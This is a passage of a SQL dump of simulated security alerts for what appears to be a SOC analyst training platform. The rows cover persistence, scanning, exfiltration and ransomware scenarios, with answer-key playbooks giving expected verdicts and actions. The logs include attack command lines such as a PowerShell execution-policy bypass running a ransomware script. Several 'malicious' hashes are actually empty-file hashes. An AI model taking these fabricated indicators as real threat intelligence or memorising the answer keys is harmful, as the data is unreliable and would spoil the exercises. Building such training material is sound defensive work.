(1544, 'Establishing Persistence Mechanism', 'medium', 'Registry Change Logs', 'The attackers modify system registry settings to establish a persistent presence, allowing them to maintain access even after system reboots. A particular registry key associated with system startup was altered to include a malicious executable linked to known APT activity.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:23Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.20\",\"username\":\"compromised_user\",\"registry_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"action\":\"MODIFY\",\"new_value\":\"C:\\\\Windows\\\\System32\\\\malicious.exe\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"file\":\"malicious.exe\"}', '2026-03-15 19:12:00', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"File recognized as a component of malware used in persistence mechanisms.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.451Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"MODIFY\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"file\\\":\\\"malicious.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.451Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"MODIFY\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"file\\\":\\\"malicious.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.451Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"MODIFY\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"file\\\":\\\"malicious.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.451Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"MODIFY\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"file\\\":\\\"malicious.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.451Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"MODIFY\\\",\\\"new_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"file\\\":\\\"malicious.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1545, 'Internal Network Reconnaissance', 'medium', 'Network Traffic Analysis', 'The attackers begin to explore the internal network, searching for critical systems and valuable data, preparing for further exploitation.', 'Lateral Movement', 'T1046: Network Service Scanning', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:07Z\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"10.0.2.15\",\"attacker_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"port\":445,\"user\":\"john.doe\",\"filename\":\"network_mapper.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event\":\"Suspicious network scanning detected\",\"additional_info\":{\"scan_type\":\"SMB\",\"attempts\":5,\"detected_by\":\"IDS\",\"previous_incidents\":\"None\"}}', '2026-03-15 19:12:00', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal workstation IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal server IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP used in multiple previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with network scanning malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"network_mapper.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual application used for network scanning.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Activity Logs\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1546, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) System', 'Exfiltration of sensitive data has been detected, indicating the final stage of an attack where attackers prepare to leverage stolen information for ransom demands.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:27:03Z\",\"event_id\":\"EXFIL12345\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.50\",\"destination_port\":\"443\",\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"exfil_filename\":\"confidential_data.zip\",\"exfil_filehash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"alert\",\"message\":\"Data exfiltration attempt detected over HTTPS to external IP.\"}', '2026-03-15 19:12:00', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration destination used in previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection and Response\",\"verdict\":\"suspicious\",\"details\":\"File previously flagged in similar exfiltration attempts.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Standard user credentials.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.455Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:03Z\\\",\\\"event_id\\\":\\\"EXFIL12345\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"confidential_data.zip\\\",\\\"exfil_filehash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"alert\\\",\\\"message\\\":\\\"Data exfiltration attempt detected over HTTPS to external IP.\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.455Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:03Z\\\",\\\"event_id\\\":\\\"EXFIL12345\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"confidential_data.zip\\\",\\\"exfil_filehash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"alert\\\",\\\"message\\\":\\\"Data exfiltration attempt detected over HTTPS to external IP.\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.455Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:03Z\\\",\\\"event_id\\\":\\\"EXFIL12345\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"confidential_data.zip\\\",\\\"exfil_filehash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"alert\\\",\\\"message\\\":\\\"Data exfiltration attempt detected over HTTPS to external IP.\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.455Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:03Z\\\",\\\"event_id\\\":\\\"EXFIL12345\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"confidential_data.zip\\\",\\\"exfil_filehash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"alert\\\",\\\"message\\\":\\\"Data exfiltration attempt detected over HTTPS to external IP.\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.455Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:27:03Z\\\",\\\"event_id\\\":\\\"EXFIL12345\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.50\\\",\\\"destination_port\\\":\\\"443\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfil_filename\\\":\\\"confidential_data.zip\\\",\\\"exfil_filehash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"alert\\\",\\\"message\\\":\\\"Data exfiltration attempt detected over HTTPS to external IP.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1547, 'Suspicious Exchange Server Access Detected', 'high', 'Exchange Server Logs', 'The Play APT group begins their attack by exploiting known vulnerabilities in the Exchange server, aiming to establish a foothold within the network. Anomalous login attempt detected from an external IP associated with known malicious activity.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T03:45:27Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"admin\",\"status\":\"failed\",\"error_code\":\"0xC000006A\",\"logon_type\":3,\"user_agent\":\"Mozilla/5.0\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"exploit_tool.exe\"}', '2026-03-15 19:12:22', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous APT campaigns targeting Exchange servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal Exchange server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash related to known exploit tool used by Play APT.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Privileged account used for administrative purposes.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"status\\\":\\\"failed\\\",\\\"error_code\\\":\\\"0xC000006A\\\",\\\"logon_type\\\":3,\\\"user_agent\\\":\\\"Mozilla/5.0\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"exploit_tool.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"status\\\":\\\"failed\\\",\\\"error_code\\\":\\\"0xC000006A\\\",\\\"logon_type\\\":3,\\\"user_agent\\\":\\\"Mozilla/5.0\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"exploit_tool.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"status\\\":\\\"failed\\\",\\\"error_code\\\":\\\"0xC000006A\\\",\\\"logon_type\\\":3,\\\"user_agent\\\":\\\"Mozilla/5.0\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"exploit_tool.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"status\\\":\\\"failed\\\",\\\"error_code\\\":\\\"0xC000006A\\\",\\\"logon_type\\\":3,\\\"user_agent\\\":\\\"Mozilla/5.0\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"exploit_tool.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"status\\\":\\\"failed\\\",\\\"error_code\\\":\\\"0xC000006A\\\",\\\"logon_type\\\":3,\\\"user_agent\\\":\\\"Mozilla/5.0\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"file_name\\\":\\\"exploit_tool.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1548, 'Malicious Script Execution on Compromised Server', 'high', 'Endpoint Detection and Response (EDR)', 'An attacker executed a script on the compromised server to deploy ransomware payloads, initiating the encryption process on critical systems. Immediate attention is required to prevent data loss.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"event_id\":\"EDR123456\",\"host\":{\"hostname\":\"compromised-server\",\"ip\":\"192.168.1.45\"},\"user\":\"admin_user\",\"process\":{\"pid\":6789,\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\temp\\\\ransom_script.ps1\"},\"network\":{\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.10\",\"protocol\":\"TCP\",\"dst_port\":\"443\"},\"file\":{\"path\":\"C:\\\\temp\\\\ransom_script.ps1\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"},\"alert\":{\"type\":\"Malicious Script Execution\",\"level\":\"critical\",\"description\":\"Suspicious script execution detected, potentially used for ransomware deployment.\"}}', '2026-03-15 19:12:22', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address used by threat actors.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware script.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransom_script.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"malicious\",\"details\":\"Filename of the ransomware script.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1549, 'Persistence Mechanism Installed', 'medium', 'System Registry Changes', 'Attackers have modified the system registry to establish persistence, ensuring continued access to the compromised network. This change allows them to return even if initial access is detected and blocked.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:34Z\",\"hostname\":\"compromised-host\",\"user\":\"malicious_user\",\"internal_ip\":\"192.168.1.100\",\"external_ip\":\"203.0.113.45\",\"registry_key_modified\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"registry_value\":\"C:\\\\Malware\\\\maliciousapp.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"Registry Key Created\"}', '2026-03-15 19:12:22', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with multiple attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used for persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Monitoring\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 